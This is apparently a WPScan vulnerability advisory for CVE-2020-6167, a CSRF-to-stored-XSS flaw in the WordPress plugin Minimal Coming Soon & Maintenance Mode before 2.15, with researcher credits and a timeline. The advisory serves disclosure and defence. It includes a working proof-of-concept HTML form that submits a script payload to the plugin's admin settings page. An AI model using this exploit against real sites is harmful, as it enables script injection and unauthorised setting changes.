Minimal Coming Soon & Maintenance Mode < 2.15 - CSRF to Stored XSS and Setting Changes



Description
This plugin had no nonce checks on any of the settings to verify that a request came from a legitimate source, such as a logged in administrative user. Therefore, creating a CSRF to stored XSS in addition to significant setting changes. 
Proof of Concept
<html>
  <body>
    <form action="URL/wp-admin/options-general.php?page=maintenance_mode_options" method="POST">
      <input type="hidden" name="signals_csmm_showlogged" value="1" />
      <input type="hidden" name="signals_csmm_html" value="<script>alert(1)</script>" />
      <input type="hidden" name="signals_csmm_css" value="" />
      <input type="hidden" name="signals_csmm_submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugin

References

CVE 2020-6167
URL https://www.wordfence.com/blog/2020/01/multiple-vulnerabilities-patched-in-minimal-coming-soon-maintenance-mode-coming-soon-page-plugin/

Classification

Type CSRF
CWE CWE-352

Miscellaneous

Original Researcher Chloe Chamberland
Submitter Chloe Chamberland
Submitter Website wordfence.com
Submitter Twitter infosecchloe
Views 128429
Verified No
WPVDB ID 10007

Timeline

Publicly Published 2020-01-08 (about 2 months ago)
Added 2020-01-08 (about 2 months ago)
Last Updated 2020-01-09 (about 2 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin